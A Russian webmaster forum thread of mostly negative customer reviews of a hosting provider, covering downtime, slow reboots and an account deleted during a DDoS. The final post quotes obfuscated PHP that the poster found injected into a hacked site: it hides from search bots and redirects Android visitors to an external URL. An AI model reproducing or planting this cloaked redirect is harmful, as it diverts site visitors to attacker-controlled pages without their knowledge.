- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Петухов Виктор, там есть адрес руководителя. На форуме вас нельзя однозначно индетифицировать поэтому не все данные можно сообщать. Обратитесь в ТП или (если они вам чем то не угодили) к руководителю по электронной почте вам все расскажут. Вас ткнули носом в нарушение. А подробности на форумах расписывать никто не обязан.
Вы в техподдержку писали? Что они вам ответили?
Т.е., когда, например, школьник с панелью разобраться не может,пишет сюда, все норм.
А я почему то обязан писать именно в ТП, а тут не имею право, штоль, бро?
И чего вы все привязались с этой ТП??? Один тролль вбросил и пошли наперегонки строчить, здесь только положительные отзывы можно постить, я что то не всосу
Т.е., когда, например, школьник с панелью разобраться не может,пишет сюда, все норм.
А я почему то обязан писать именно в ТП, а тут не имею право, штоль, бро?
И чего вы все привязались с этой ТП??? Один тролль вбросил и пошли наперегонки строчить, здесь только положительные отзывы можно постить, я что то не всосу
Вопросы про панель - это скорее консультации, на такие вопросы можно ответить где угодно.
Обсуждение причин блокировки/удаления/содержимого Вашего VPS - совсем другое дело и, на мой взгляд, руководство компании правильно делает, что не выдаёт эту информацию на публику.
Если Вам реально важны подробности, давно бы уже написали в поддержку и всё выяснили.
А отзывы строчить никто не запрещает, строчите, если Вам есть о чём сказать. Но вот обсуждать ли конкретно Вашу проблему здесь или нет - выбор хостера.
Хостинг стал просто ужас. Очередь на перезагрузку сервера длится более 30 минут, соответственно сайты в дауне. Постоянно (примерно 3 раза в день) происходит беспричинное зависание сайтов, причем не в пики нагрузки. Тариф:Юпитер. Хотя еще год назад был отличный хостинг.
Хостинг стал просто ужас. Очередь на перезагрузку сервера длится более 30 минут, соответственно сайты в дауне. Постоянно (примерно 3 раза в день) происходит беспричинное зависание сайтов, причем не в пики нагрузки. Тариф:Юпитер. Хотя еще год назад был отличный хостинг.
А что говорит тех. поддержка?
А что говорит тех. поддержка?
Вначале писали что очередь на перезагрузку, через минут 10 я повторил вопрос, сказали что уже перезагрузился, но не было доступа по ssh и всего остального. Я опять написал, через минут 10 ответили, что проблема с сервером и они уже занимаются. Через минут 10 заработало. Сегодня ситуация еще хуже, сайты больше лежат, чем работают. Правда перезагрузка стала происходить быстрее (значительно). В общем готовлю площадку и ухожу от них. Очень жалко более 1,5 лет с ними.
---------- Добавлено 07.05.2015 в 18:47 ----------
Сейчас опять не перезагружается сервер, поддержка вновь ссылается на проблемы с сервером и они уже занимаются. А мне что делать? Сайты весь день больше лежат, чем работают. В общем ужас полный!
Отвратительный и ужасный хостинг. Кто то начал DDoSить мой сайт а хостер просто взял и забанил мой заказ сразу удалив сайт, без каких либо предупреждений и оповещений. Я не могу попасть ни в панель управления, ни по FTP, возможности получить бекап сайта нет (Вы же не заказывали услугу бекапа ©).
Потдерживаю, контора оставляет желать лучшего. Опыт общения с администраторами печален и безрезультатен.
Потдерживаю, контора оставляет желать лучшего. Опыт общения с администраторами печален и безрезультатен.
На какую тему общались?
Пользуюсь хостингом пару лет, проблем не было. Суппорт работает отлично. Но есть проблема, которая реально бесит очень сильно. На 1 аккаунте несколько сайтов, панель ihc. Когда ломают один сайт, то вредоносный код закидывают по всем сайтам, это просто УЖАСНО! Можно же дать звиздюлей своим програмерам, чтобы сделали разделение сайтов. Чтобы придурки взламывая сайт могли только на нем лазить и не было доступа к другим сайтам на аккаунте! А то как ломанут, начинай искать где и что изменили, куда шелл залили и так далее. Это очень проблематично лечить сайты и дорого.
Сделайте пожалуйста разделение сайтов!
Вот такой код нашел:
$gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];
if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {
if((preg_match('/ndroi|htc_|htc-/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/'))
{header(strrev('=REREFER_PTTH&1=ru&lmth.41'.'/67namyrros/'.'stneilc'.'/cc.'.'slm'.'thx'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}